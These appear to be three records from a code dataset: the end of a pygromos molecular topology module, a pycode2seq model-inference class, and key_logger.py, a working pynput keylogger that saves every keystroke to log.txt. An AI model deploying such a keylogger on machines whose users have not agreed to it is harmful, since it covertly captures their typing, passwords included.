'Dummy']\n self.add_block(blocktitle=\"PRESSUREGROUPS\", content=defaultContent, verbose=verbose)\n self.PRESSUREGROUPS.content.append([number])\n self.PRESSUREGROUPS.content.remove(['Dummy'])\n else:\n if len(self.PRESSUREGROUPS.content) < 1:\n self.PRESSUREGROUPS.content.append([\"0\"])\n self.PRESSUREGROUPS.content.append([number])\n self.PRESSUREGROUPS.content[0][0] = str(int(self.PRESSUREGROUPS.content[0][0])+1)\n\n def get_mass(self) -> float:\n \"\"\"\n Calculates the total mass of the solute molecule\n\n Returns\n -------\n float\n total mass in a.u.\n \"\"\"\n mass = 0\n if hasattr(self, \"SOLUTEATOM\"):\n for i in self.SOLUTEATOM.content:\n mass += i.MASS\n return mass\n \n\n 
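\n# --- illustrative usage (a hypothetical sketch, not part of the original module) ---\n# Assuming top is an instance of this topology class, the helpers above compose like this;\n# the atom names, LJ values and the 0.109 nm constraint length below are invented for illustration:\n# top.add_new_atom(ATNM=1, MRES=1, PANM=\"CA\", MASS=12.011, C6=2.3e-3, C12=3.4e-6, IACname=\"CA\")\n# top.add_new_atom(ATNM=2, MRES=1, PANM=\"HA\", MASS=1.008, C6=8.0e-5, C12=1.0e-7, IACname=\"HA\")\n# top.add_new_CONSTRAINT(IC=1, JC=2, ICC=0.109)\n# top.get_mass() # -> 13.019 a.u. (12.011 + 1.008)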
\n\n","sub_path":"pygromos/files/topology/top.py","file_name":"top.py","file_ext":"py","file_size_in_byte":28748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"583230350","text":"import os\n\nfrom torch.utils import data\nfrom pycode2seq.inference.parsing.utils import read_astminer\nfrom typing import List, Tuple, Dict\n\nimport torch\nimport numpy as np\n\nfrom code2seq.dataset import PathContextBatch, PathContextSample, PathContextDataset\nfrom code2seq.dataset.data_classes import ContextPart, FROM_TOKEN, PATH_NODES, TO_TOKEN\nfrom code2seq.model import Code2Seq\nfrom code2seq.utils.converting import strings_to_wrapped_numpy\nfrom code2seq.utils.metrics import PredictionStatistic\nfrom code2seq.utils.vocabulary import Vocabulary\nfrom omegaconf import OmegaConf\nfrom torch import Tensor\n\nfrom pycode2seq.inference.language import Language\nfrom pycode2seq.inference.model.labels import LabeledData, extract_labels_with_paths\nfrom pycode2seq.inference.model.loader import ModelLoader\nfrom pycode2seq.inference.paths.extracting import ExtractingParams\n\n\nfrom code2seq import utils\nimport sys\nsys.modules[\"utils\"] = utils\n\n\nclass Model:\n models_gdrive_file_ids = {\n \"kt_java\": \"1v8GFPraNFLmiQxXBZAK3K9CIyhIADp-t\",\n \"java\": \"1v8GFPraNFLmiQxXBZAK3K9CIyhIADp-t\",\n \"kt\": \"1v8GFPraNFLmiQxXBZAK3K9CIyhIADp-t\",\n \"kotlin\": \"1v8GFPraNFLmiQxXBZAK3K9CIyhIADp-t\"\n }\n\n multi_models = [\"kt_java\"]\n\n @staticmethod\n def load(name: str) -> 'Model':\n save_path = ModelLoader.model_path(name)\n os.makedirs(save_path, exist_ok=True)\n\n model_path = os.path.join(save_path, \"model\")\n config_path = os.path.join(model_path, \"code2seq.yaml\")\n vocabulary_path = os.path.join(model_path, \"vocabulary.pkl\")\n checkpoint_path = os.path.join(model_path, \"model.ckpt\")\n\n required_files = [config_path, vocabulary_path, checkpoint_path]\n\n if not all(os.path.exists(file) for file in required_files):\n print(\"Downloading model\")\n ModelLoader.load(name, Model.models_gdrive_file_ids[name])\n\n return Model(config_path, vocabulary_path, checkpoint_path, ExtractingParams(8, 3, 200), name)\n\n def __init__(self, config_path: str, vocabulary_path: str, checkpoint_path: str,\n extracting_params: ExtractingParams, model_name: str) -> None:\n self.config = OmegaConf.load(config_path)\n self.vocabulary = Vocabulary.load_vocabulary(vocabulary_path)\n self.model = Code2Seq(self.config, self.vocabulary)\n\n self.model.load_state_dict(torch.load(checkpoint_path, map_location=torch.device('cpu'))[\"state_dict\"])\n\n self.device = torch.device(\"cpu\")\n self.to(self.device)\n self.model.eval()\n\n self.extracting_params = extracting_params\n\n self.model_name = model_name\n self.default_lang = None if model_name in Model.multi_models else model_name\n\n def to(self, device: torch.device):\n self.device = device\n self.model.to(self.device)\n\n def _prepare_batches(self, file_path: str, language: Language) -> Tuple[List[PathContextBatch], List[str]]:\n root = language.parse(file_path)\n data = extract_labels_with_paths(root, self.extracting_params, language.split_on_methods)\n method_names = [d.method_name for d in data]\n batches = [PathContextBatch([self._labeled_data_to_sample(method, 200, True)]) for method in data]\n\n for batch in batches:\n batch.move_to_device(self.device)\n\n return batches, method_names\n\n def methods_embeddings(self, file_path: str, language: str = None) -> Dict[str, Tensor]:\n language = language or 
self.default_lang\n if language is None:\n language = file_path.split('.')[-1]\n batches, method_names = self._prepare_batches(file_path, Language.by_name(language))\n\n with torch.no_grad():\n embeddings = {}\n for batch, method_name in zip(batches, method_names):\n encoded_paths = self.model.encoder(batch.contexts)\n\n # [n layers; batch size; decoder size]\n coded_batch = [ctx_batch.mean(0).unsqueeze(0) for ctx_batch in\n encoded_paths.split(batch.contexts_per_label)]\n initial_state = (torch.cat(coded_batch).unsqueeze(0))\n embeddings[method_name] = initial_state.squeeze()\n return embeddings\n\n def run_model_on_astminer_csv(self, data_path: str, language: str) -> List[Tensor]:\n # data_path -- path to folder with generated csvs\n data = read_astminer(data_path)\n batches = [PathContextBatch([self._string_to_sample(method, 200, True)]) for method in data]\n\n for batch in batches:\n batch.move_to_device(self.device)\n\n with torch.no_grad():\n return [self.model(batch.contexts, batch.contexts_per_label, batch.labels.shape[0]) for batch in batches]\n\n def run_model_on_file(self, file_path: str, language: str) -> List[Tensor]:\n batches, method_names = self._prepare_batches(file_path, Language.by_name(language))\n\n with torch.no_grad():\n return [self.model(batch.contexts, batch.contexts_per_label, batch.labels.shape[0]) for batch in batches]\n\n def _run_model_on_file_with_metrics(self, file_path: str, language: str):\n batches, method_names = self._prepare_batches(file_path, Language.by_name(language))\n\n results = []\n\n with torch.no_grad():\n for batch in batches:\n logits = self.model(batch.contexts, batch.contexts_per_label, batch.labels.shape[0], batch.labels)\n prediction = logits.argmax(-1)\n\n statistic = PredictionStatistic(True, self.model._label_pad_id, self.model._metric_skip_tokens)\n batch_metric = statistic.update_statistic(batch.labels, prediction)\n\n results.append(batch_metric)\n\n return results\n\n def _string_to_sample(self, data: str, max_contexts: int, random_context: bool) -> PathContextSample:\n str_label, *str_contexts = data.split()\n if str_label == \"\" or len(str_contexts) == 0:\n print(f\"Bad sample {data}\")\n return None\n\n # choose random paths\n n_contexts = min(len(str_contexts), max_contexts)\n context_indexes = np.arange(n_contexts)\n if random_context:\n np.random.shuffle(context_indexes)\n \n parameters = self.config.dataset.target\n\n # convert string label to wrapped numpy array\n wrapped_label = strings_to_wrapped_numpy(\n [str_label],\n self.vocabulary.label_to_id,\n parameters.is_splitted,\n parameters.max_parts,\n parameters.is_wrapped,\n )\n\n context_parts = [\n ContextPart(FROM_TOKEN, self.vocabulary.token_to_id, self.config.dataset.token),\n ContextPart(PATH_NODES, self.vocabulary.node_to_id, self.config.dataset.path),\n ContextPart(TO_TOKEN, self.vocabulary.token_to_id, self.config.dataset.token),\n ]\n\n # convert each context to list of ints and then wrap into numpy array\n splitted_contexts = [PathContextDataset._split_context(str_contexts[i]) for i in context_indexes]\n contexts = {}\n for _cp in context_parts:\n str_values = [_sc[_cp.name] for _sc in splitted_contexts]\n contexts[_cp.name] = strings_to_wrapped_numpy(\n str_values, _cp.to_id, _cp.parameters.is_splitted, _cp.parameters.max_parts, _cp.parameters.is_wrapped\n )\n\n return PathContextSample(contexts=contexts, label=wrapped_label, n_contexts=n_contexts) \n \n def _labeled_data_to_sample(self, data: LabeledData, max_contexts: int, random_context: bool) -> 
PathContextSample:\n return self._string_to_sample(str(data), max_contexts, random_context)\n\n def _get_label_by_id(self, label_id: int) -> str:\n # reverse lookup in the label vocabulary (linear scan; fine for occasional decoding)\n return list(self.vocabulary.label_to_id.keys())[list(self.vocabulary.label_to_id.values()).index(label_id)]\n\n def prediction_to_text(self, prediction: Tensor) -> str:\n ids = prediction.argmax(-1)\n return \"|\".join([self._get_label_by_id(token_ids[0]) for token_ids in ids])\n","sub_path":"pycode2seq/inference/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"193020179","text":"from pynput.keyboard import Key, Listener\n\ncount = 0\nkeys = []\n\ndef on_press(key):\n # buffer every key press and flush the buffer to disk after every 10th press\n global keys, count\n keys.append(key)\n count += 1\n print(f'{key} is pressed')\n if count >= 10:\n count = 0\n write_file(keys)\n keys = []\n\ndef write_file(keys):\n with open('log.txt', 'a+') as f:\n for key in keys:\n no_quotes_key = str(key).replace(\"'\",\"\")\n if \"space\" in no_quotes_key:\n f.write(' ')\n elif \"Key\" not in no_quotes_key:\n f.write(no_quotes_key)\n f.write('\\n')\n\ndef on_release(key):\n # stop listening (and flush any remaining buffered keys) when Escape is released\n global keys\n if key == Key.esc:\n write_file(keys)\n return False\n\nwith Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()\n","sub_path":"Python/key_logger/key_logger.py","file_name":"key_logger.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}